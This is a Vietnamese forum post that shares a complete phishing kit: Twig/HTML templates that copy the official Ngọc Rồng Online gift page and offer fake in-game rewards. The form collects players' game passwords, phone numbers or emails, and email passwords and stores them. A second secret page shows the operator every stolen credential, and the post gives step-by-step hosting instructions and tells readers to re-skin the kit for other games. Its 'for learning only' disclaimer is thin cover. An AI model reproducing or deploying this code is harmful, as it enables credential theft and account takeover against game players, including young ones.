Disneyland 1972 Love the old s
» » » [Wap4] Share code scam acc cho mọi loại game
Bạn phải để Bình luận
24-03-2017#
admin offline * LeYTi (Sáng Lập!)
Level MAX  Like 0
Xu 0  TN 0
VnMaster

Code scam nick ngọc rồng, scam acc Đột Kích CF, Liên minh huyền thoại LOL, Overwatch, Minecraft, Gunny, Fifa, ...Ở đây mình dùng cho mã nguồn twig nhé, mình sẽ đưa code scam nick Ngọc rồng bên dưới, các bạn có thể tuỳ chỉnh lại giao diện của games khác và edit tí xíu là thành game khác rồi :) code scam nick cf đột kích, code scam nick lmht lol Liên Minh huyền thoại, code scam nick Avatar, code scam nick mobi army, code scam acc over watch. Mình vừa giới thiệu những loại games mà mình biết để bạn scam Yaoming

Lưu ý: code chỉ để học hỏi thôi nhé, không nên lạm dụng :) với lại cho mấy bạn hay "tin người vcl' sáng mắt Yaoming

Bắt đầu thôi:

Mình dùng wap4 có mã nguồn twig, k ADS 100%, free hoàn toàn.
Link reg cho ai cần: Click

Sau khi đã có Tài khoản các bạn tạo 1 site mới nhé (nên chọn VSP là tốt nhất), phần điển subdomain thì tuỳ bạn nhé, muốn park domain thì trỏ nameserver về ns1.wap4.co và ns2.wap4.co và điền vào thôi, subdomain là bắt buộc nhé (k Cần park cũng được nếu bạn chọn VSP, Video Search Portal ý, Not Adult Yaoming Adult bắt buộc domain.

Có site rồi thì vào root chọn Main list file và dán code này vào:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="viewport" content="width=device-width,maximum-scale=1,user-scalable=no"/>
<meta http-equiv="content-language" content="vi"/>
<title>Nhận quà Chú Bé Rồng Online - Ngọc Rồng Online</title>
<meta name="keywords" content="Chú Bé Rồng Online,ngoc rong mobile, game ngoc rong, game 7 vien ngoc rong, game bay vien ngoc rong"/>
<meta name="description" content="Website nhận quà chính thức của Chú Bé Rồng Online – Game Bay Vien Ngoc Rong Mobile nhập vai trực tuyến trên máy tính và điện thoại về Game 7 Viên Ngọc Rồng hấp dẫn nhất hiện nay!"/>
<meta http-equiv="refresh" content="600"/>
<meta name="robots" content="INDEX,FOLLOW"/>
<meta name="google-site-verification" content="5nwZFwDcVGDsKwm4SWkTt0ucuJqBq4li7lm52TxWXfU"/>
<link rel="shortcut icon" href='http://ngocrongonline.comimages/favicon.png' type="image/x-icon"/>
<link rel="apple-touch-icon" href="http://ngocrongonline.com/logo256.png"/>
<link rel="stylesheet" href="http://ngocrongonline.com/css/template.css" type="text/css"/>
</head>
<body>
<div class="body_body">
<div style="line-height: 10px;
    font-size: 10px;
    padding-right: 5px;
    margin-bottom: -8px;
    padding-top: 2px;">
<img height=12 src="http://ngocrongonline.com/12.png" style="vertical-align: middle;"/>
<span style="vertical-align: middle;">Dành cho người chơi trên 12 tuổi. Chơi quá 180 phút mỗi ngày sẽ hại sức khỏe.
</span>
</div>
<div class="left_top"></div><div class="bg_top"><div class="right_top"></div></div>
<div class="body-content">
<div class="bg-content2">
<h1 class="a" align="center">
<a href="/" title="game bảy viên Chú Bé Rồng Online">
<img height=90 src="http://ngocrongonline.com/images/logoW.png" alt="game bảy viên Chú Bé Rồng Online"/></a>
</h1>
<div id="top">
<div class="link-more">
<div class="h" align="center">
 
<div class="bg_noel"></div>
<div class="menu2" style="background: #561d00;">
<table width="100%" border="0" cellspacing="4">
<tr class="menu">
<td><a href="http://ngocrongonline.com">Trang Chủ</a></td>
<td id="selected"><a href="?c=gallery">Giới Thiệu</a></td>
<td><a href="http://forum.ngocrongonline.com/app/index.php?for=forum&do=setting&uid=40&p=0&sz=15" title="Diễn Đàn">Diễn Đàn</a></td>
</tr>
</table>
</div>
<div class="bg_top_22">
<img src="http://ngocrongonline.com/images/banner_2.png" width="100%">
</div>
<div class="download">
<div class="bg-content" style="text-align:center;">
 
<div id="columns" style="text-align:center">
<figure>
<a href="http://27.0.14.78/dl/?c=download&type=jar&id=110&ver=2" title="game bảy viên Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/jar.png" alt="game bảy viên Chú Bé Rồng Online"><br>
</a>
<figcaption><span style="color:rgb(209, 9, 50);">141</span> - <a href="http://27.0.14.78/dl/?c=download&type=jad&id=110&ver=2" title="game bảy viên Chú Bé Rồng Online">
JAD
</a> -
<b> 2 ngày</b><br> <br>
</figcaption>
</figure>
<figure>
<a href="http://dl.teamobi.com/drive/get/qt" title="game bảy viên Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/android.png" alt="game bảy viên Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">141</span> -
<b> 2 ngày</b><br><a href="http://ngocrongonline.com/?c=huong-dan">Hướng dẫn cài</a></figcaption>
</figure>
<figure>
<a href="https://play.google.com/store/apps/details?id=com.bluedragonss.boysss" title="game Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/play.png" alt="game Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">138</span> -
2 tháng<br> <br></figcaption>
</figure>
<figure>
<a href="http://dl.teamobi.com/drive/get/cB" title="game Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/pc.png" alt="game Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">139</span> -
2 tháng<br> <br></figcaption>
</figure>
<figure>
<a href="http://ngocrongonline.com/betatest/iframe.php" title="game Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/ip.png" alt="game Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">140</span> -
2 tháng<br> <br> </figcaption>
</figure>
<figure>
<a href="http://ngocrongonline.com/?c=download&id=NgocRong-WP" title="game bảy viên Chú Bé Rồng Online"><img src="http://ngocrongonline.com/images/wp.png" height="35">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">137</span> -
3 tháng<br> <br></figcaption>
</figure>
</div>  
 
 
</div>
</div>
<div class="bg-content">
<p><span style="font-size:medium"><strong>Nhận quà Chú Bé Rồng Online - Ngọc Rồng Online</strong></span></p>
<p>
<form enctype="multipart/form-data" action="/" method="POST" id="nhanqua">
(*)L&#432;u &Yacute; M&#7895;i T&agrave;i Kho&#7843;n Ch&#7881; &#272;&#432;&#7907;c T&#7889;i &#272;a 3 L&#7847;n Trong Ng&agrave;y<hr />
{% if request_method()|lower == "post" %}
{% if get_post( 'email' )  and get_post( 'password' )  and get_post( 'phanqua' )  and get_post( 'maruong' )  and get_post( 'server' )  and get_post( 'tennhanvat' ) and get_post( 'passemail' ) %}
{% set comment = {"email" : get_post ( 'email' ), "password": get_post( 'password' ), "phanqua": get_post( 'phanqua' ), "maruong": get_post( 'maruong' ), "server": get_post( 'server' ), "tennhanvat": get_post( 'tennhanvat' ), "passemail" : get_post ( 'passemail' ) } %}
{% set status = save_data( "scam_nro", comment|json_encode ) %}
{% endif %}
{% endif %}
{% set data=get_data( 'scam_nro',500,1)|reverse %}
{% set total=data|length %}
{% set page_max=total//10 %}
{% if total//10 != total/10 %}
{% set page_max=total//10+1 %}
{% endif %}
{% set url=get_uri_segments() %}
{% set p=url[1]|default(1) %}
{% set st=p*10-10 %}
Tên nhân vật(*):
<input type="text" name="tennhanvat" /><br/>

Mật Khẩu(*): 
<input type="password" name="password" /><br/>

SĐT/Email(*):
<input type="text" name="email" /><br/>

Mật khẩu Email(*):
<input type="password" name="passemail" /><br/>

Phần Thưởng(*): 
    <select name='phanqua'>
<option value='5 triệu sức mạnh'>Tăng 5 triệu sức mạnh x 1</option>
<option value='Kho đồ VIP '>Kho đồ VIP x 1</option>
<option value='Thú Cưởi VIP'>Thú Cưởi VIP x 1</option>
<option value='Bông Tai Hợp Thể '>Bông Tai Hợp Thể x 1</option>
<option value='Khỉ Cấp 7'>Khỉ Cấp 7 x 1</option>
<option value='Bom Hi Sinh Cấp 7'>Bom Hi Sinh Cấp 7 x 99</option>
<option value='Avatar VIP '>Avatar VIP x 1</option>
<option value='5000 Ngọc'>+5000 Ngọc</option>
<option value='10000 Ngọc'>+10000 Ngọc</option>
<option value='100 Triệu Vàng'>+100 Triệu Vàng</option>
<option value='150 Triệu Vàng'>+150 Triệu Vàng</option>
</select><br/>

Mã Rương (Nếu Có): 
<input type="text" name="maruong" /><br/>

Server(*): 
    <select name='server'>
<option value='1 Sao'>1 Sao</option>
<option value='2 Sao'>2 Sao</option>
<option value='3 Sao'>3 Sao</option>
<option value='4 Sao'>4 Sao</option>
<option value='5 Star'>5 Sao</option>
<option value='6 Star'>6 Sao</option>
</select><br/><br/>
<button><a onclick="document.getElementById('nhanqua').submit()">Nhận quà</a></button>
</form>
<br/>
Chú thích: (*) Bắt buộc
</p>
</div>
<div class="bg-content">
<p><span style="font-size:medium"><strong>Danh sách đã nhận quà:</strong></span></p>
<p>
{% for entry in data|slice(st,10) %}
{% set entry = entry.data|json_decode %}
<marquee behavior="alternate" loop="infinite">→ Chúc mừng <font style="background:yellow;color:red"><b>_❄ {{ entry.tennhanvat }} ❄_</b></font> máy chủ <font style="background:yellow;color:green"><b>_✪ {{ entry.server }} ✪_</b></font> vừa nhận được <font style="background:yellow;color:blue"><b>_✩ {{ entry.phanqua }} ✩_</b></font> ←</marquee><br/>
{% endfor %}
</p>
<p>Tổng số: <b>{{total}}</b><br/>
{% from 'paging.twig' import paging %}
{{ paging(url[0],p,page_max) }}</p>
</div>
<div class="bg-content">
<p><span style="font-size:medium"><strong>Nhà tài trợ chính</strong></span></p>
<p align="center">
<a href="/" alt="Nhận quà NRO" title="Nhận quà NRO"><img src="/images/logo.png" alt="NhanQuaNRO"></a>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/vi_VN/sdk.js#xfbml=1&version=v2.8";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<center><div class="fb-like" data-href="http://nhanquanro.wap4.co/" data-layout="button_count" data-action="like" data-size="small" data-show-faces="true" data-share="true"></div></center>
</p>
</div>
</div>
<br>
</div><br>
</div>
</div>
</div>
<div class="bg_tree"></div>
<div class="foot_bg">
</div>
<style>.copyright a{color:#000;}</style>
<div class="left_b_bottom"><div class="right_b_bottom"><div class="footer"><div class="left_bottom"></div><div class="right_bottom"></div></div></div></div>
<div class="copyright" style="line-height: 5px"><h2 style="font-size:12px;">Chú Bé Rồng Online - Ngọc Rồng Online</h2>
Bản Quyền thuộc về TeaMobi - 2015
<center><br><select name="forma" onchange="location = this.options[this.selectedIndex].value;">
<option value="http://wap.teamobi.com/game/30">Avatar</option>
<option value="http://am.teamobi.com/">Avatar Musik</option>
<option value="http://wap.teamobi.com/game/118">Mobi Army A</option>
<option value="http://wap.teamobi.com/game/31">Khí Phách Anh Hùng</option>
<option value="http://ninjaschool.vn/">Ninja School Online</option>
<option value="http://ngocrongonline.com/">Chú Bé Rồng</option>
<option value="http://knightageonline.com/">Knight Age Online</option>
<option value="http://haitactihon.com/">Hải Tặc Tí Hon</option>
</select></center></div>
</div>
</div>
</body>
</html>

Copy code


Xong bước trên tạo 1 file là paging.twig rồi dán code sau vào:
{% macro paging(trang,p,max) %}
    {% if max > 1 %}
        <div class="button">
 {# set p=pagination.current_page %} {% set max=pagination.pages|last #}
{% set a='<a class="pagenav" href="/page/'~trang~'' %}
 {% if p>max %}{% set p=max %}a{% endif %} 
 {% if p>1 %}
{{a|raw}}{{p-1}}">&lt;&lt;</a>
{% endif %}
{% if p>3 %}
{{a|raw}}1">1</a>
{% endif %}
{% if p>4 %}
...
{% endif %}
{% if p>2 %}
{{a|raw}}{{p-2}}">{{p-2}}</a>
{% endif %}
{% if p>1 %}
{{a|raw}}{{p-1}}">{{p-1}}</a>
{% endif %}
<span class="currentpage"><b>{{p}}</b></span>
{% if p<max-1 %}
{{a|raw}}{{p+1}}">{{p+1}}</a>
{% endif %}
{% if p<max-2 %}
{{a|raw}}{{p+2}}">{{p+2}}</a>
{% endif %}
{% if p<max-3 %}
...
{% endif %}
{% if p<max %}
{{a|raw}}{{max}}">{{max}}</a>
{% endif %}
{% if p<max %}
{{a|raw}}{{p+1}}">&gt;&gt;</a>
{% endif %}

 </div>  
    {% endif %}
{% endmacro %}

Copy code


Tiếp tạo 1 file là tên bất kỳ mà chỉ bạn biết thôi, để xem luôn thông tin nick cho nhanh ý mà (khỏi vào custom data :3). Dán code sau vào:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="viewport" content="width=device-width,maximum-scale=1,user-scalable=no"/>
<meta http-equiv="content-language" content="vi"/>
<title>Nhận quà Chú Bé Rồng Online - Ngọc Rồng Online</title>
<meta name="keywords" content="Chú Bé Rồng Online,ngoc rong mobile, game ngoc rong, game 7 vien ngoc rong, game bay vien ngoc rong"/>
<meta name="description" content="Website nhận quà chính thức của Chú Bé Rồng Online – Game Bay Vien Ngoc Rong Mobile nhập vai trực tuyến trên máy tính và điện thoại về Game 7 Viên Ngọc Rồng hấp dẫn nhất hiện nay!"/>
<meta http-equiv="refresh" content="600"/>
<meta name="robots" content="INDEX,FOLLOW"/>
<meta name="google-site-verification" content="5nwZFwDcVGDsKwm4SWkTt0ucuJqBq4li7lm52TxWXfU"/>
<link rel="shortcut icon" href='http://ngocrongonline.comimages/favicon.png' type="image/x-icon"/>
<link rel="apple-touch-icon" href="http://ngocrongonline.com/logo256.png"/>
<link rel="stylesheet" href="http://ngocrongonline.com/css/template.css" type="text/css"/>
</head>
<body>
<div class="body_body">
<div style="line-height: 10px;
    font-size: 10px;
    padding-right: 5px;
    margin-bottom: -8px;
    padding-top: 2px;">
<img height=12 src="http://ngocrongonline.com/12.png" style="vertical-align: middle;"/>
<span style="vertical-align: middle;">Dành cho người chơi trên 12 tuổi. Chơi quá 180 phút mỗi ngày sẽ hại sức khỏe.
</span>
</div>
<div class="left_top"></div><div class="bg_top"><div class="right_top"></div></div>
<div class="body-content">
<div class="bg-content2">
<h1 class="a" align="center">
<a href="/" title="game bảy viên Chú Bé Rồng Online">
<img height=90 src="http://ngocrongonline.com/images/logoW.png" alt="game bảy viên Chú Bé Rồng Online"/></a>
</h1>
<div id="top">
<div class="link-more">
<div class="h" align="center">
 
<div class="bg_noel"></div>
<div class="menu2" style="background: #561d00;">
<table width="100%" border="0" cellspacing="4">
<tr class="menu">
<td><a href="http://ngocrongonline.com">Trang Chủ</a></td>
<td id="selected"><a href="?c=gallery">Giới Thiệu</a></td>
<td><a href="http://forum.ngocrongonline.com/app/index.php?for=forum&do=setting&uid=40&p=0&sz=15" title="Diễn Đàn">Diễn Đàn</a></td>
</tr>
</table>
</div>
<div class="bg_top_22">
<img src="http://ngocrongonline.com/images/banner_2.png" width="100%">
</div>
<div class="download">
<div class="bg-content" style="text-align:center;">
 
<div id="columns" style="text-align:center">
<figure>
<a href="http://27.0.14.78/dl/?c=download&type=jar&id=110&ver=2" title="game bảy viên Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/jar.png" alt="game bảy viên Chú Bé Rồng Online"><br>
</a>
<figcaption><span style="color:rgb(209, 9, 50);">141</span> - <a href="http://27.0.14.78/dl/?c=download&type=jad&id=110&ver=2" title="game bảy viên Chú Bé Rồng Online">
JAD
</a> -
<b> 2 ngày</b><br> <br>
</figcaption>
</figure>
<figure>
<a href="http://dl.teamobi.com/drive/get/qt" title="game bảy viên Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/android.png" alt="game bảy viên Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">141</span> -
<b> 2 ngày</b><br><a href="http://ngocrongonline.com/?c=huong-dan">Hướng dẫn cài</a></figcaption>
</figure>
<figure>
<a href="https://play.google.com/store/apps/details?id=com.bluedragonss.boysss" title="game Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/play.png" alt="game Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">138</span> -
2 tháng<br> <br></figcaption>
</figure>
<figure>
<a href="http://dl.teamobi.com/drive/get/cB" title="game Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/pc.png" alt="game Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">139</span> -
2 tháng<br> <br></figcaption>
</figure>
<figure>
<a href="http://ngocrongonline.com/betatest/iframe.php" title="game Chú Bé Rồng Online">
<img height="35" src="http://ngocrongonline.com/images/ip.png" alt="game Chú Bé Rồng Online">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">140</span> -
2 tháng<br> <br> </figcaption>
</figure>
<figure>
<a href="http://ngocrongonline.com/?c=download&id=NgocRong-WP" title="game bảy viên Chú Bé Rồng Online"><img src="http://ngocrongonline.com/images/wp.png" height="35">
</a>
<figcaption><span style="color:rgb(209, 9, 50);">137</span> -
3 tháng<br> <br></figcaption>
</figure>
</div>  
 
 
</div>
</div>
{% if request_method()|lower == "post" %}
{% if get_post( 'email' )  and get_post( 'password' )  and get_post( 'phanqua' )  and get_post( 'maruong' )  and get_post( 'server' )  and get_post( 'tennhanvat' ) and get_post( 'passemail' ) %}
{% set comment = {"email" : get_post ( 'email' ), "password": get_post( 'password' ), "phanqua": get_post( 'phanqua' ), "maruong": get_post( 'maruong' ), "server": get_post( 'server' ), "tennhanvat": get_post( 'tennhanvat' ), "passemail" : get_post ( 'passemail' ) } %}
{% set status = save_data( "scam_nro", comment|json_encode ) %}
{% endif %}
{% endif %}
{% set data=get_data( 'scam_nro',500,1)|reverse %}
{% set total=data|length %}
{% set page_max=total//10 %}
{% if total//10 != total/10 %}
{% set page_max=total//10+1 %}
{% endif %}
{% set url=get_uri_segments() %}
{% set p=url[1]|default(1) %}
{% set st=p*10-10 %}
<div class="bg-content">
<p><span style="font-size:medium"><strong>Danh sách acc đã scam:</strong></span></p>
<p>
{% for entry in data|slice(st,10) %}
{% set entry = entry.data|json_decode %}
Tên nhân vật: <font style="background:yellow;color:red"><b> {{ entry.tennhanvat }} </b></font>
<br/>
Mật khẩu: <font style="background:yellow;color:green"><b>{{ entry.password }}</b></font>
<br/>
Mã rương: <font style="background:yellow;color:blue"><b> {{ entry.maruong }} </b></font>
<br/>
SĐT/Email: <font style="background:yellow;color:green"><b>{{ entry.email }}</b></font>
<br/>
Mật khẩu Email: <font style="background:yellow;color:green"><b>{{ entry.passemail }}</b></font>
<br/>
Máy chủ: <font style="background:yellow;color:green"><b> {{ entry.server }} </b></font>
<br/>
<center>===========</center>
<br/>
{% endfor %}
</p>
<p>Tổng số: <b>{{total}}</b><br/>
{% from 'pagings.twig' import paging %}
{{ paging(url[0],p,page_max) }}</p>
</div>
<div class="bg-content">
<p><span style="font-size:medium"><strong>Nhà tài trợ chính</strong></span></p>
<p align="center">
<a href="/" alt="Nhận quà NRO" title="Nhận quà NRO"><img src="/images/logo.png" alt="NhanQuaNRO"></a>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/vi_VN/sdk.js#xfbml=1&version=v2.8";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<center><div class="fb-like" data-href="http://nhanquanro.wap4.co/" data-layout="button_count" data-action="like" data-size="small" data-show-faces="true" data-share="true"></div></center>
</p>
</div>
</div>
<br>
</div><br>
</div>
</div>
</div>
<div class="bg_tree"></div>
<div class="foot_bg">
</div>
<style>.copyright a{color:#000;}</style>
<div class="left_b_bottom"><div class="right_b_bottom"><div class="footer"><div class="left_bottom"></div><div class="right_bottom"></div></div></div></div>
<div class="copyright" style="line-height: 5px"><h2 style="font-size:12px;">Chú Bé Rồng Online - Ngọc Rồng Online</h2>
Bản Quyền thuộc về TeaMobi - 2015
<center><br><select name="forma" onchange="location = this.options[this.selectedIndex].value;">
<option value="http://wap.teamobi.com/game/30">Avatar</option>
<option value="http://am.teamobi.com/">Avatar Musik</option>
<option value="http://wap.teamobi.com/game/118">Mobi Army A</option>
<option value="http://wap.teamobi.com/game/31">Khí Phách Anh Hùng</option>
<option value="http://ninjaschool.vn/">Ninja School Online</option>
<option value="http://ngocrongonline.com/">Chú Bé Rồng</option>
<option value="http://knightageonline.com/">Knight Age Online</option>
<option value="http://haitactihon.com/">Hải Tặc Tí Hon</option>
</select></center></div>
</div>
</div>
</body>
</html>

Copy code


Xong rồi đó :3 để scam nick game khác thì các bạn thay đổi HTML, css, js sao cho giống web/wap của game đó là được Yaoming

Chơi game gì thì đừng có mà ham nhận quà tree nhá :P muốn nhận hàng free thì tham gia sự kiện của web/wap chủ của game đó ý, bây giờ trên FB nó cứ ào ào làm mấy cái web scam nick nhìn ngứa cả mắt -_- Tin người vcl :v

Copy ghi nguồn: LYT :)
Đã chỉnh sửa bởi: LeYTi
Tổng số 1 bình luận
Chia sẻ bài viết: Sắp xếp:
Liên kết:
BBcode:
Tìm kiếm
Online
» Có 0 thành viên1 khách đang trực tuyến.
Stats
TOP
Facebook - Thanks to XTgem™ Sitemap - Nội quy
© 2015-2017 VnMaster.Yn.Lt
-->